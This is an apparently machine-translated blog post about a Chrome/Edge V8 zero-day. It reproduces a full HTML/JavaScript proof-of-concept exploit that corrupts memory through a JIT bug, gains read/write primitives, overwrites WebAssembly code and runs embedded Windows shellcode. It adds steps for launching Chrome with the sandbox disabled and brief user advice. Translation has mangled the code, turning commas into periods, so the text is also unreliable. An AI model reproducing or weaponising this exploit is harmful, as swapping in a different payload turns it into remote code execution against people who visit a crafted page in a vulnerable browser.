Vulnerability describes
Google Chrome is a free web browser developed by Google. As tested, the 0day vulnerability affected the latest official version of Chrome (90.0.4430.72) and the Official version of Microsoft Edge based on the Chromium kernel (89.0.774.77). An attacker can exploit this vulnerability to obtain remote code execution by constructing a customized Web page and inducing the victim to access it.
scope
Google Chrome < = 90.0.4430.72
Microsoft Edge based on Chromium kernel <= 89.0.774.77
Other v8-based browsers
poc
Links:Github.com/avboy1337/1…
The HTML file is as follows:
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [0xFC.0x48.0x83.0xE4.0xF0.0xE8.0xC0.0x00.0x00.0x00.0x41.0x51.0x41.0x50.0x52.0x51.0x56.0x48.0x31.0xD2.0x65.0x48.0x8B.0x52.0x60.0x48.0x8B.0x52.0x18.0x48.0x8B.0x52.0x20.0x48.0x8B.0x72.0x50.0x48.0x0F.0xB7.0x4A.0x4A.0x4D.0x31.0xC9.0x48.0x31.0xC0.0xAC.0x3C.0x61.0x7C.0x02.0x2C.0x20.0x41.0xC1.0xC9.0x0D.0x41.0x01.0xC1.0xE2.0xED.0x52.0x41.0x51.0x48.0x8B.0x52.0x20.0x8B.0x42.0x3C.0x48.0x01.0xD0.0x8B.0x80.0x88.0x00.0x00.0x00.0x48.0x85.0xC0.0x74.0x67.0x48.0x01.0xD0.0x50.0x8B.0x48.0x18.0x44.0x8B.0x40.0x20.0x49.0x01.0xD0.0xE3.0x56.0x48.0xFF.0xC9.0x41.0x8B.0x34.0x88.0x48.0x01.0xD6.0x4D.0x31.0xC9.0x48.0x31.0xC0.0xAC.0x41.0xC1.0xC9.0x0D.0x41.0x01.0xC1.0x38.0xE0.0x75.0xF1.0x4C.0x03.0x4C.0x24.0x08.0x45.0x39.0xD1.0x75.0xD8.0x58.0x44.0x8B.0x40.0x24.0x49.0x01.0xD0.0x66.0x41.0x8B.0x0C.0x48.0x44.0x8B.0x40.0x1C.0x49.0x01.0xD0.0x41.0x8B.0x04.0x88.0x48.0x01.0xD0.0x41.0x58.0x41.0x58.0x5E.0x59.0x5A.0x41.0x58.0x41.0x59.0x41.0x5A.0x48.0x83.0xEC.0x20.0x41.0x52.0xFF.0xE0.0x58.0x41.0x59.0x5A.0x48.0x8B.0x12.0xE9.0x57.0xFF.0xFF.0xFF.0x5D.0x48.0xBA.0x01.0x00.0x00.0x00.0x00.0x00.0x00.0x00.0x48.0x8D.0x8D.0x01.0x01.0x00.0x00.0x41.0xBA.0x31.0x8B.0x6F.0x87.0xFF.0xD5.0xBB.0xF0.0xB5.0xA2.0x56.0x41.0xBA.0xA6.0x95.0xBD.0x9D.0xFF.0xD5.0x48.0x83.0xC4.0x28.0x3C.0x06.0x7C.0x0A.0x80.0xFB.0xE0.0x75.0x05.0xBB.0x47.0x13.0x72.0x6F.0x6A.0x00.0x59.0x41.0x89.0xDA.0xFF.0xD5.0x6E.0x6F.0x74.0x65.0x70.0x61.0x64.0x2E.0x65.0x78.0x65.0x00];
var wasmCode = new Uint8Array([0.97.115.109.1.0.0.0.1.133.128.128.128.0.1.96.0.1.127.3.130.128.128.128.0.1.0.4.132.128.128.128.0.1.112.0.0.5.131.128.128.128.0.1.0.1.6.129.128.128.128.0.0.7.145.128.128.128.0.2.6.109.101.109.111.114.121.2.0.4.109.97.105.110.0.0.10.138.128.128.128.0.1.132.128.128.128.0.0.65.42.11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var main = wasmInstance.exports.main;
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);
function fLow(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(0.true));
}
function fHi(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(4.true))}function i2f(low, hi) {
bfView.setUint32(0, low, true);
bfView.setUint32(4, hi, true);
return bfView.getFloat64(0.true);
}
function f2big(f) {
bfView.setFloat64(0, f, true);
return bfView.getBigUint64(0.true);
}
function big2f(b) {
bfView.setBigUint64(0, b, true);
return bfView.getFloat64(0.true);
}
class LeakArrayBuffer extends ArrayBuffer {
constructor(size) {
super(size);
this.slot = 0xb33f; }}function foo(a) {
let x = -1;
if (a) x = 0xFFFFFFFF;
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
arr.shift();
let local_arr = Array(2);
local_arr[0] = 5.1;/ / 4014666666666666
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
arr[0] = 0x1122;
return [arr, local_arr, buff];
}
for (var i = 0; i < 0x10000; ++i)
foo(false);
gc(); gc();
[corrput_arr, rwarr, corrupt_buff] = foo(true);
corrput_arr[12] = 0x22444;
delete corrput_arr;
function setbackingStore(hi, low) {
rwarr[4] = i2f(fLow(rwarr[4]), hi);
rwarr[5] = i2f(low, fHi(rwarr[5]));
}
function leakObjLow(o) {
corrupt_buff.slot = o;
return (fLow(rwarr[9]) - 1);
}
let corrupt_view = new DataView(corrupt_buff);
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
let delta = baseAddr + 0x1c - idx0Addr;
if ((delta % 8) = =0) {
let baseIdx = delta / 8;
this.base = fLow(rwarr[baseIdx]);
} else {
let baseIdx = ((delta - (delta % 8)) / 8);
this.base = fHi(rwarr[baseIdx]);
}
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8.true);
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
corrupt_view.setUint8(i, shellcode[i]);
}
main();
</script>
Copy the codesteps
Run the following command in CMD and open the HTML file
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -no-sandbox
Copy the codeNote: This is the default installation path
Repetition demo
Please go to the official account to view the video
Repair advice
At present, Google has not fixed this vulnerability, which is still in the 0day state. Users are advised to be cautious about clicking suspicious urls and handling suspicious emails and attachments. Especially in the attack and defense drill close to actual combat scenario, attackers are likely to use this vulnerability to attack the defense system. Use Firefox when possible
Network rumors combined with other vulnerabilities can bypass browser sandbox restrictions, using methods have not been disclosed, but remind the majority of users still need to pay attention to prevention
Reference links:
Mp.weixin.qq.com/s/gVBsX62O3…
Mp.weixin.qq.com/s/G-ffg_TDR…
Baijiahao.baidu.com/s?id=169699…
Welcome to pay attention to the public number, the original is not easy, reprint please indicate the source [patriotic little white hat] 😘
“Like” to prove you still love me